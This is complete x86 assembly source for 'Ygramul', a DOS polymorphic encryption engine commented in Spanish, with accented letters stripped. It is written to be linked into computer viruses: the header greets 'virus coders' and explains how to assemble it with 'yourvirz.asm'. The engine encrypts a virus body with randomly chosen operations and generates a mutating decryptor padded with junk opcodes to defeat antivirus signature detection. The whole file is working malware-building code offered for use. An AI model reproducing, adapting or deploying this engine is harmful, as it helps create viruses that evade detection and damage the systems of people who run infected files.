;                   Ŀ                       
;                       Ŀ    
;                               
;                             
;                          Polymorphic Engine
;
;     Primera librera de polimorfismo de la Repblica del Paraguay
; Encripta el cdigo aleatoriamente y genera un desencriptor fijo de 33
; bytes, de ese modo se puede usar size-stealth. Ygramul size=828 bytes
;                        Programacin: Int13h
;
; ENTRADA:
;        DS:SI = cdigo a encriptar
;        ES:DI = donde poner desencriptor+cdigo encriptado
;        BP    = offset en el archivo donde el desencriptor se ejecutar
;        CX    = longitud del cdigo a cifrar (+828!)
; SALIDA:
;        ES:DI = desencriptor+cdigo encriptado
;        CX    = cantidad de bytes a escribir en el fichero
;
; Se  asume  que  CS=DS  y  que  la  rutina Ygramul reside en el CS
; El valor de los otros registros se pierde excepto los de segmento
; Ygramul era el nombre del monstruo mutante del libro "La historia sin fin"
; de  Michael  Ende.  De  ah  viene  este nombre de sonar tan peregrino :-)
;
; Compiling...
; tasm yourvirz.asm
; tlink [/t] yourvirz.obj ygramul.obj
;
;                                              Greeting to all virus coders!
.Model Tiny
.Code

Public Ygramul
Longitud_del_decryptor = offset encriptora_1-offset instruccion_2

Ygramul:
call Obtener_Delta_Offset               ; Ponemos el IP siguiente en la pila
Obtener_Delta_Offset:
pop bx                                  ; Y tenemos nuestro offset maestro
sub bx,offset Obtener_Delta_Offset
mov word ptr [bx+MetalCX1],CX           ; Guardamos longitud a cifrar
mov word ptr [bx+MetalCX2],CX           ; Guardamos longitud a cifrar
mov word ptr [bx+MetalBP],BP            ; Guardamos el offset en el archivo
mov word ptr [bx+MetalES],ES            ; Guardamos segmento extra
mov word ptr [bx+MetalSI],SI            ; Guardamos inicio del cdigo a cifrar
mov word ptr [bx+MetalDI],DI            ; Guardamos posicion para el desencriptor

lea si,[bx+offset ClaveEnc_1]
lea di,[bx+offset ClaveDec_1]

in ax,40h                               ; Nmero aleatorio del puerto 40h
test al,al                              ; Comprobar si es 0
jnz Pasamos_al
inc al                                  ; Si es 0 lo volvemos 1
Pasamos_al:
and ah,ah                               ; Cero?
jnz Pasamos_ah
dec ah                                  ; Lo tornamos en 255
Pasamos_ah:
mov byte ptr [si+3],ah                  ; Colocamos las claves aleatorias
mov byte ptr [di+3],ah                  ; obtenidas
mov byte ptr [si],al                    ; Ajustamos las instrucciones de
mov byte ptr [di],al                    ; encripcin y desencripcin con
in al,40h                               ; Otro nmero random para la ltima
or al,al                                ; Checar por 0
jnz Listo
inc al                                  ; Uno
Listo:
mov byte ptr [si+6],al                  ; Asignamos los valores a nuestras
mov byte ptr [di+6],al                  ; variables :)

push cs
pop es                                  ; ES=CS=DS
push bx                                 ; Guardar nuestro delta
lea di,[bx+offset Encriptora_4+2]       ; Donde rellenar primeramente
lea bx,[bx+Opcodes_de_un_byte]          ; Tabla de opcodes
mov si,6                                ; Rellenaremos 6 partes

Rellenar:
mov cx,17                               ; De entre 17 opcodes posibles
call Obtener_Numero_Aleatorio           ; Elegimos uno
xlat                                    ; Lo transladamos a AL
stosb                                   ; Lo almacenamos en ES:DI
inc di                                  ; Apuntamos al siguiente lugar
inc di                                  ; a rellenar
dec si                                  ; Bajamos nuestro contador
jnz Rellenar                            ; Si no acab, repetir
pop bx                                  ; Recuperar nuestro offset maestro

mov cx,127                              ; Obtenemos un desplazamiento
call obtener_numero_aleatorio           ; aleatorio para nuestro ndice
sub word ptr [bx+MetalBP],ax            ; Y lo restamos al ndice, solo
mov byte ptr [bx+Desplazamiento1],al    ; para aadir variabilidad
mov byte ptr [bx+Desplazamiento2],al

mov cx,4                                ; Elegir entre cuatro registros
call Obtener_Numero_Aleatorio           ; posibles para nuestro ndice
; 1=SI,2=DI,3=BP,4=BX
mov byte ptr [bx+Indice],al             ; Guardar registro de ndice
lea si,[bx+Instruccion_2]
lea di,[bx+Instruccion_3+2]
lea bp,[bx+Instruccion_4]

cmp al,1
jnz No_fue_Uno                          ; SI!
mov byte ptr [si],0beh                  ; Corregir ndice en el desencriptor
mov byte ptr [di],07ch                  ; Corregir ndice al cargar
mov byte ptr ds:[bp+2],07ch             ; Corregir ndice al descargar
mov byte ptr ds:[bp+4],046h             ; Corregir aumentador de ndice
jmp short Seleccionar_Contador          ; Usamos ds: porque con BP ss es el
No_fue_Uno:                             ; segmento implcito!
cmp al,2
jnz No_fue_Dos                          ; DI!
mov byte ptr [si],0bfh                  ; Corregir ndice en el desencriptor
mov byte ptr [di],07dh                  ; Corregir ndice al cargar
mov byte ptr ds:[bp+2],07dh             ; Corregir ndice al descargar
mov byte ptr ds:[bp+4],047h             ; Corregir aumentador de ndice
jmp short Seleccionar_Contador
No_fue_Dos:
cmp al,3
jnz Fue_Cuatro                          ; BP!
mov byte ptr [si],0bdh                  ; Corregir ndice en el desencriptor
mov byte ptr [di],07eh                  ; Corregir ndice al cargar
mov byte ptr ds:[bp+2],07eh             ; Corregir ndice al descargar
mov byte ptr ds:[bp+4],045h             ; Corregir aumentador de ndice
jmp short Seleccionar_Contador
Fue_Cuatro:                             ; BX!
mov byte ptr [si],0bbh                  ; Corregir ndice en el desencriptor
mov byte ptr [di],07fh                  ; Corregir ndice al cargar
mov byte ptr ds:[bp+2],07fh             ; Corregir ndice al descargar
mov byte ptr ds:[bp+4],043h             ; Corregir aumentador de ndice

; SI,DI,BP,BX,CX,DX
Seleccionar_Contador:
mov cx,6
call Obtener_Numero_Aleatorio           ; Elegimos nuestro contador
mov ah,byte ptr [bx+Indice]
cmp ah,al                               ; No debe coincidir con el ndice
je Seleccionar_Contador
mov byte ptr [bx+Contador],al           ; Guardar registro contador

; SI,DI,BP,BX,CX,DX
lea si,[bx+Instruccion_1]               ; Aqu ajustamos el contador
lea di,[bx+Instruccion_6]
cmp al,1
jnz Uno_no_fue
mov byte ptr [si],0beh                  ; SI!
mov byte ptr [di],04eh
jmp short Mutar_registros_de_trabajo
Uno_no_fue:
cmp al,2
jne Dos_no_fue
mov byte ptr [si],0bfh                  ; DI!
mov byte ptr [di],04fh
jmp short Mutar_registros_de_trabajo
Dos_no_fue:
cmp al,3
jne Tres_no_fue
mov byte ptr [si],0bdh                  ; BP!
mov byte ptr [di],04dh
jmp short Mutar_registros_de_trabajo
Tres_no_fue:
cmp al,4
jne Cuatro_no_fue
mov byte ptr [si],0bbh                  ; BX!
mov byte ptr [di],04bh
jmp short Mutar_registros_de_trabajo
Cuatro_no_fue:
cmp al,5
jne Seis_fue
mov byte ptr [si],0b9h                  ; CX!
mov byte ptr [di],049h
jmp short Mutar_registros_de_trabajo
Seis_fue:
mov byte ptr [si],0bah                  ; DX!
mov byte ptr [di],04ah

Mutar_registros_de_Trabajo:
; ch,cl,dh,dl,bh,bl
mov cx,6                                ; Elegir entre los registros
call Obtener_Numero_Aleatorio           ; posibles para la carga/descarga
mov [bx+Carga],al
mov cl,[bx+Indice]
mov ch,[bx+Contador]
cmp al,2
ja No_CX
cmp ch,5
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_CX:
cmp al,4
ja No_DX
cmp ch,6
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_DX:
cmp cl,4
je Mutar_registros_de_Trabajo
cmp ch,4
je Mutar_registros_de_Trabajo


Almacenar:
and byte ptr [bx+Instruccion_3+2],047h  ; Separar lo que queremos
and byte ptr [bx+Instruccion_4+2],047h

; ch,cl,dh,dl,bh,bl

cmp al,1                                ; Y colocar el registro
jnz Uno_no_ha_sido
mov al,00101000b
jmp short ORearlo
Uno_no_ha_sido:
cmp al,2
jne Dos_no_ha_sido
mov al,00001000b
jmp short ORearlo
Dos_no_ha_sido:
cmp al,3
jne Tres_no_ha_sido
mov al,00110000b
jmp short ORearlo
Tres_no_ha_sido:
cmp al,4
jne Cuatro_no_ha_sido
mov al,00010000b
jmp short ORearlo
Cuatro_no_ha_sido:
cmp al,5
jne Fue_Six
mov al,00111000b
jmp short ORearlo
Fue_Six:
mov al,00011000b

ORearlo:
mov byte ptr [bx+Orear],al              ; Para modificar las instrucciones desencriptoras
or byte ptr [bx+Instruccion_3+2],al
or byte ptr [bx+Instruccion_4+2],al

lea di,[bx+offset Encriptar]            ; Llena el vector Encriptar
mov ax,15
call Llenar_con_basura

lea di,[bx+offset Buffer]
mov ax,15
call Llenar_con_basura

mov cx,5                                ; Seleccionar 0-5 oper. para encriptar...
call Obtener_Numero_Aleatorio
mov byte ptr [bx+Cantidad],al           ; Guardar cantidad escogida
mov bp,ax

lea di,[bx+offset Encriptar]            ; Apunta a las operaciones encriptoras

xor dx,dx
Seleccionar_Instrucciones:
lea si,[bx+offset Encriptora_1-3]       ; Toma una operacin criptora
mov cx,9                                ; ...de entre las nueve operaciones posibles
call Obtener_Numero_Aleatorio
mov cl,3
mul cl
add si,ax
movsw                                   ; Y lo lleva a Encriptar
movsb
push si
push di                                 ; Salvados SI y DI
add si,24                               ; Apunta a la operacin desencriptora
lea di,[bx+offset Buffer]               ; correspondiente y la copia al buffer
add di,dx
add dx,3
movsw
movsb
pop di                                  ; Luego recupera SI y DI anteriores
pop si
dec bp
jnz Seleccionar_Instrucciones           ; ...y el carrusell sigue girando

mov bp,3
lea si,[bx+offset Encriptar]

mov cx,5
Inversor:
lea di,[bx+offset Instruccion_4]        ; Copia Encriptar a Desencriptar
sub di,bp                               ; pero de forma invertida!
add bp,3
movsw
movsb
loop Inversor

lea si,[bx+offset Buffer]
lea di,[bx+offset Encriptar]            ; Copia el Buffer a Encriptar
mov cx,15
rep movsb

lea si,[(bx+offset Instruccion_4)-2]
mov al,byte ptr [bx+Orear]
mov cl,3
shr al,cl
xor cx,cx
mov cl,byte ptr [bx+Cantidad]
Proceder:
and byte ptr [si],11111000b             ; Modifica los registros en el
or byte ptr [si],al                     ; desencriptor generado
sub si,3
loop Proceder


; Esta rutina realiza de facto la encripcin con las instrucciones elegidas
db 0bfh                                 ; mov di,donde ponerlo
MetalDI  dw 0
db 0b8h                                 ; mov ax,segmento extra
MetalES  dw 0
mov es,ax                               ; Recobrar el ES recibido
db 0bah                                 ; mov dx,longitud a cifrar
MetalCX1 dw 0
mov cx,Longitud_del_decryptor
add word ptr [bx+MetalBP],cx            ; Ajustamos aqu por el size
push cx                                 ; del desencriptor a tener en cuenta
lea si,[bx+offset Instruccion_2]        ; Aadimos desencriptor al buffer
rep movsb
pop cx
add cx,dx                               ; Longitud a escribir devuelve en CX
db 0beh                                 ; mov si,cdigo a cifrar
MetalSI  dw 0

Realizar_la_encripcion:
mov bh,byte ptr ds:[si]
; Aqu irn las operaciones lgicas y matemticas sobre el byte
Encriptar db 15 dup(0fbh)
mov byte ptr es:[di],bh
inc si
inc di
dec dx
jnz Realizar_la_encripcion
ret                                     ; Retorna al cdigo que llam


; Este es el esqueleto bsico del desencriptor
Instruccion_2:   db 0beh                ; mov si,inicio de lo cifrado
                 MetalBP dw 0
Instruccion_1:   db 0bah                ; mov dx,longitud a cifrar
                 MetalCX2 dw 0
Instruccion_3:   db 02eh,08ah,07ch      ; mov bh,byte ptr cs:[si+x]
                 Desplazamiento1 db 0
; Aqu irn las operaciones lgicas y matemticas sobre el byte
                 Desencriptar db 15 dup(0f8h)
Instruccion_4:   db 02eh,088h,07ch      ; mov byte ptr cs:[si+x],bh
                 Desplazamiento2 db 0
Instruccion_5:   inc si
Instruccion_6:   dec dx
                 jnz Instruccion_3


; La tabla de instrucciones encriptoras
Encriptora_1:    db 080h,0c7h           ; add bh,0
                 ClaveEnc_1 db 0
Encriptora_2:    db 080h,0efh           ; sub bh,0
                 ClaveEnc_2 db 0
Encriptora_3:    db 080h,0f7h           ; xor bh,0
                 ClaveEnc_3 db 0
Encriptora_4:    inc bh
                 int 3
Encriptora_5:    dec bh
                 sti
Encriptora_6:    not bh
                 stc
Encriptora_7:    neg bh
                 cld
Encriptora_8:    ror bh,1
                 cmc
Encriptora_9:    rol bh,1
                 nop

; La tabla de instrucciones desencriptoras
Desencriptora_1: db 080h,0efh           ; sub bh,0
                 ClaveDec_1 db 0
Desencriptora_2: db 080h,0c7h           ; add bh,0
                 ClaveDec_2 db 0
Desencriptora_3: db 080h,0f7h           ; xor bh,0
                 ClaveDec_3 db 0
Desencriptora_4: dec bh
                 nop
Desencriptora_5: inc bh
                 stc
Desencriptora_6: not bh
                 clc
Desencriptora_7: neg bh
                 sti
Desencriptora_8: rol bh,1
                 cmc
Desencriptora_9: ror bh,1
Opcodes_de_un_byte:
                 cld

db 090h,0cch,0fch,0fbh,0f8h,0f9h,0f5h,037h,02fh,027h
db 03fh,0ceh,098h,09fh,09bh,040h,048h

db '[Ygramul by Int13h]'

; Entrega un nmero aleatorio entre 0 y CX
Obtener_Numero_Aleatorio:
push dx
push di
in ax,40h
mov dx,106
mul dx
add ax,1283
mov di,6075
adc dx,0
div di
mov ax,dx
mul cx
div di
pop di
pop dx
inc ax
ret

Garbler:
mov cx,15
call Obtener_Numero_Aleatorio
Llenar_con_basura:
mov bp,ax
Repetir:
lea si,word ptr [bx+Opcodes_de_un_byte]
mov cx,17
call Obtener_Numero_Aleatorio
add si,ax
movsb
dec bp
jnz Repetir
ret

Cantidad db 0                           ; Nmero de instrucciones encriptoras
Orear    db 0                           ; Valor para modificar registros
Buffer:                                 ; Para ahorrar 3 bytes ;)
Indice   db 0                           ; Registro de ndice a usar
Contador db 0                           ; Registro contador a utilizar
Carga    db 0                           ; Registro donde efectuar la carga
         db 13 dup(90h)                 ; El encriptador ir aqu

End Ygramul
